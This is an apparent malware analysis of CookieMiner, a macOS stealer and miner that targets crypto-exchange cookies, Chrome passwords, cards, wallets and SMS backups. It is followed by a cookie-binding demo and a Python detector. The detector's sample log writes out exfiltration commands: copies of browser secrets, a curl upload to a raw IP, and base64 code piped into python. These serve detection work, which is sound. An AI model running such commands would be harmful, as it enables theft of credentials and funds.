

The user's saved login credentials




Palo Alto Networks' Unit 42 recently discovered malware that they believe has been developed from OSX.DarthMiner, a malware known to target the Mac platform. This malware is capable of stealing browser cookies associated with mainstream cryptocurrency exchanges and wallet service websites visited by the victims. It also steals saved passwords in Chrome. By leveraging the combination of stolen login credentials, web cookies, and SMS data, and based on past attacks like this, Unit 42 believes the bad actors could bypass multi-factor authentication for these sites. If successful, the attackers would have full access to the victim's exchange account and/or wallet and be able to use those funds as if they were the user themselves.

The malware also configures the system to load coinmining software. This software is made to look like an XMRIG-type coinminer, which is used to mine Monero. In fact, though, it loads a coinminer that mines Koto, a lesser-known cryptocurrency that is associated with Japan. Because of the way this malware attacks the cookies associated with exchanges, Unit 42 has named it “CookieMiner”. The following sections first briefly introduce some background knowledge, and then dig into the technical details of the malware's behaviors.

Background

Web cookies are widely used for authentication. Once a user logs into a website, its cookies are stored so the web server knows the login status. If the cookies are stolen, the attacker could potentially sign into the website and use the victim's account.

A cryptocurrency exchange is a place to trade cryptocurrencies for other assets, such as other digital (crypto)currencies or conventional fiat money. Most modern cryptocurrency exchanges and online wallet services have multi-factor authentication. Stealing cookies is an important step in bypassing login anomaly detection: if only the username and password are stolen and used by a bad actor, the website may issue an alert or request additional authentication for a new login. However, if an authentication cookie is also provided along with the username and password, the website might believe the session is associated with a previously authenticated host and not issue an alert or request additional authentication methods. CookieMiner tries to navigate past the authentication process by stealing a combination of the login credentials, text messages, and web cookies. If attackers have all the information needed for the authentication process, the multi-factor authentication may be defeated.

Google Chromium is an open-source version of the Google Chrome browser. CookieMiner adopts techniques from the Google Chromium project's code for its decryption and extraction operations and abuses them.

Technical Details

A rundown of CookieMiner's behaviors (discussed in more detail in the following sections):

- Steals Google Chrome and Apple Safari browser cookies from the victim's machine
- Steals saved usernames and passwords in Chrome
- Steals saved credit card credentials in Chrome
- Steals iPhone's text messages if backed up to Mac
- Steals cryptocurrency wallet data and keys
- Keeps full control of the victim using the EmPyre backdoor
- Mines cryptocurrency on the victim's machine

Stealing Cookies

The CookieMiner attack begins with a shell script targeting macOS. It copies the Safari browser's cookies to a folder and uploads them to a remote server (46.226.108[.]171:8000). The server hosts the service “curldrop” (https://github.com/kennell/curldrop), which allows users to upload files with curl. The attack targets cookies associated with cryptocurrency exchanges that include Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet, and any website having “blockchain” in its domain name.

Stealing Credit Cards, Passwords, Wallets and SMS

Apple's Safari is not the only web browser targeted. Google Chrome also attracts the threat actors' attention due to its popularity. CookieMiner downloads a Python script named “harmlesslittlecode.py” to extract saved login credentials and credit card information from Chrome's local data storage. By abusing the Chromium techniques mentioned above, CookieMiner attempts to steal credit card information from major issuers, such as Visa, Mastercard, American Express, and Discover. The user's saved login credentials are also stolen, including usernames, passwords, and the corresponding web URLs.

CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets.

Finally, it seeks to steal iPhone text messages from iTunes backups on the tethered Mac. If the victims use iTunes to back up files from iPhone to Mac (which can be done via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers.

Remote Control

For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of deobfuscation, Unit 42 found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically secure communications and a flexible architecture. The attacker is able to send commands to the victim's machine for remote control. Additionally, the agent checks if Little Snitch (an application firewall) is running on the victim's host. If so, it will stop and exit.

Cryptocurrency Mining

CookieMiner issues a series of commands to configure the victim's machine to mine cryptocurrency and maintain persistence. The program xmrig2 is a Mach-O executable for mining cryptocurrency. The filename xmrig2 is usually used by Monero miners; Unit 42 believes the malware authors may have intentionally used this filename to create confusion, since the miner is actually mining the Koto cryptocurrency. Koto is a Zcash-based anonymous cryptocurrency. The addresses use the “Yescrypt” algorithm, which is good for CPU miners but not ideal for GPU miners. This is ideal for malware, as the victim hosts are not guaranteed to have discrete GPUs installed but are guaranteed to have a CPU available. As seen in Figure 7, the address “k1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H” has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (kotopool.work).

Conclusion

The malware “CookieMiner” is intended to help threat actors generate profit by collecting credential information and mining cryptocurrency. If the bad actors successfully enter the websites using the victim's identity, they could perform fund withdrawals. This may be a more efficient way to generate profits than outright cryptocurrency mining. Furthermore, attackers could manipulate cryptocurrency prices with large-volume buying and/or selling of stolen assets, resulting in additional profits. Cryptocurrency owners should keep an eye on their security settings and digital assets to prevent compromise and leakage.

Customers of Palo Alto Networks are protected by WildFire, which is able to automatically detect the malware. AutoFocus users can track this activity by using the StealCookie tag.
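The login-anomaly logic described in the Background section, as an added example that is neither from the Unit 42 writeup nor CookieMiner's own code: a minimal Python model of a site whose new-login check is suppressed by any valid session cookie, beside a hardened variant that only honours the cookie from the client it was issued to. The user, password, device fingerprints, server key and the fingerprint recipe (User-Agent plus network prefix) are constructed assumptions for the example.

```python
import hashlib
import hmac
import secrets

# Constructed sample data (assumption): one user and a server-side HMAC key.
SERVER_KEY = b"constructed-server-secret"
USERS = {"alice": hashlib.sha256(b"correct horse").hexdigest()}

# session_id -> {"user", "device_fp"}; a record is created only after the
# user has completed the full login, including MFA.
SESSIONS = {}


def check_password(user, password):
    """Constant-time comparison against the stored hash (toy hashing, no salt)."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(USERS.get(user, ""), digest)


def device_fingerprint(user_agent, network):
    """Coarse server-side client fingerprint (assumption: UA plus /24 prefix)."""
    msg = f"{user_agent}|{network}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_session(user, device_fp):
    """Called after password + MFA succeeded; returns the cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "device_fp": device_fp}
    return sid


def login_naive(user, password, cookie=None):
    """Weak check: a valid cookie for this user suppresses the MFA step no
    matter where it is presented from. A replayed stolen cookie exploits this."""
    if not check_password(user, password):
        return "denied"
    record = SESSIONS.get(cookie)
    if record and record["user"] == user:
        return "ok"  # treated as the previously authenticated host
    return "mfa_required"


def login_bound(user, password, device_fp, cookie=None):
    """Hardened check: the cookie only counts when presented from the client
    it was issued to; anything else is a new login and gets the MFA challenge."""
    if not check_password(user, password):
        return "denied"
    record = SESSIONS.get(cookie)
    if (record and record["user"] == user
            and hmac.compare_digest(record["device_fp"], device_fp)):
        return "ok"
    return "mfa_required"


def demo():
    victim_fp = device_fingerprint("Safari/605 (Macintosh)", "203.0.113")
    attacker_fp = device_fingerprint("python-requests/2.21", "198.51.100")
    cookie = issue_session("alice", victim_fp)  # victim's earlier full login
    return {
        # password only from a new host: both schemes ask for MFA
        "creds_only": login_naive("alice", "correct horse"),
        # password plus the stolen cookie, presented from the attacker's host
        "stolen_cookie_naive": login_naive("alice", "correct horse", cookie),
        "stolen_cookie_bound": login_bound("alice", "correct horse", attacker_fp, cookie),
        # the victim on their own device is still not re-challenged
        "victim_bound": login_bound("alice", "correct horse", victim_fp, cookie),
        "wrong_password": login_naive("alice", "wrong", cookie),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:20s} -> {result}")
```

Binding a session to a client fingerprint only raises the bar: an attacker who also captures the victim's User-Agent and routes through the victim's network can still match it. It belongs next to a fresh MFA prompt on withdrawals and address changes, and cookies lifted from disk should be treated as a full session compromise and revoked.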
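A detection example for the chain in the Stealing Cookies and Remote Control sections, added here and not taken from the writeup or from any Palo Alto Networks product. It scans constructed macOS process-execution log lines for browser secret stores copied to a staging folder and then pushed with curl to a raw IP:port (the curldrop pattern), plus the Little Snitch probe and a base64-decoded second stage piped into python. The Safari and Chrome file paths are the standard macOS locations (not stated on the page); the log format, user names, hosts and IPs are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log (assumption): one process-execution event per line,
# "<ISO timestamp> <user> <command line>". Hosts and IPs are documentation
# ranges, not indicators from the writeup.
SAMPLE_LOG = """\
2019-01-20T09:58:12 alice /usr/bin/open -a Safari
2019-01-20T10:01:03 alice /bin/mkdir -p /Users/alice/Library/.tmp/ck
2019-01-20T10:01:04 alice /bin/cp /Users/alice/Library/Cookies/Cookies.binarycookies /Users/alice/Library/.tmp/ck/
2019-01-20T10:01:05 alice /bin/cp "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data" /Users/alice/Library/.tmp/ck/
2019-01-20T10:01:09 alice /usr/bin/curl -F file=@/Users/alice/Library/.tmp/ck/Cookies.binarycookies http://203.0.113.45:8000/
2019-01-20T10:01:11 alice /bin/sh -c "pgrep 'Little Snitch' && exit 0"
2019-01-20T10:01:15 alice /bin/sh -c "curl -s https://paste.example/abc | base64 -D | python"
2019-01-20T11:30:00 bob /usr/bin/curl -O https://dl.example.org/tool.pkg
2019-01-20T11:31:00 bob /bin/cp /Users/bob/notes.txt /Users/bob/Desktop/
"""

# Standard macOS locations of the stores the writeup says are harvested:
# Safari's cookie jar and Chrome's saved logins, cookies and autofill/card data.
BROWSER_STORES = re.compile(
    r"Library/Cookies/Cookies\.binarycookies"
    r"|Library/Application Support/Google/Chrome/[^/\"]+/(?:Login Data|Cookies|Web Data)"
)
FILE_COPY = re.compile(r"(?:^|/)(?:cp|mv|ditto|tar|zip)\s")
# curl sending a file body: -F name=@file, -T/--upload-file, or -d @file
CURL_UPLOAD = re.compile(r"\bcurl\b[^|]*?(?:-F\s+\S+=@|--upload-file\b|-T\s|-d\s+@)")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?")
FIREWALL_PROBE = re.compile(r"\b(?:pgrep|ps|lsappinfo)\b[^|]*Little Snitch", re.I)
B64_SECOND_STAGE = re.compile(
    r"\bcurl\b[^|]*\|\s*base64\s+(?:-D|-d|--decode)\b[^|]*\|\s*python"
)


def classify(cmd):
    """Return the set of rule names a single command line triggers."""
    tags = set()
    if FILE_COPY.search(cmd) and BROWSER_STORES.search(cmd):
        tags.add("browser_store_staging")
    if CURL_UPLOAD.search(cmd) and RAW_IP_URL.search(cmd):
        tags.add("curl_upload_raw_ip")
    if FIREWALL_PROBE.search(cmd):
        tags.add("firewall_discovery")
    if B64_SECOND_STAGE.search(cmd):
        tags.add("base64_second_stage")
    return tags


def parse_line(line):
    ts, user, cmd = line.split(" ", 2)
    return datetime.fromisoformat(ts), user, cmd


def detect(log_text, window=timedelta(minutes=10)):
    """One alert per user whose staging copy is followed by an upload within
    `window`; the alert carries every tag seen for that user."""
    events = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = parse_line(line)
        tags = classify(cmd)
        if tags:
            events.setdefault(user, []).append((ts, tags))
    alerts = []
    for user, seen in events.items():
        staged = [ts for ts, t in seen if "browser_store_staging" in t]
        uploads = [ts for ts, t in seen if "curl_upload_raw_ip" in t]
        chained = any(timedelta(0) <= u - s <= window for s in staged for u in uploads)
        if chained:
            alerts.append({
                "user": user,
                "first": min(ts for ts, _ in seen).isoformat(),
                "last": max(ts for ts, _ in seen).isoformat(),
                "tags": sorted(set().union(*(t for _, t in seen))),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The staging-then-upload pairing is what keeps this from firing on an ordinary `curl -F` upload or a routine profile backup; the firewall probe and the base64 second stage are recorded as supporting tags rather than triggers. In production the same rules would run over endpoint process events (osquery, Endpoint Security) rather than a text log.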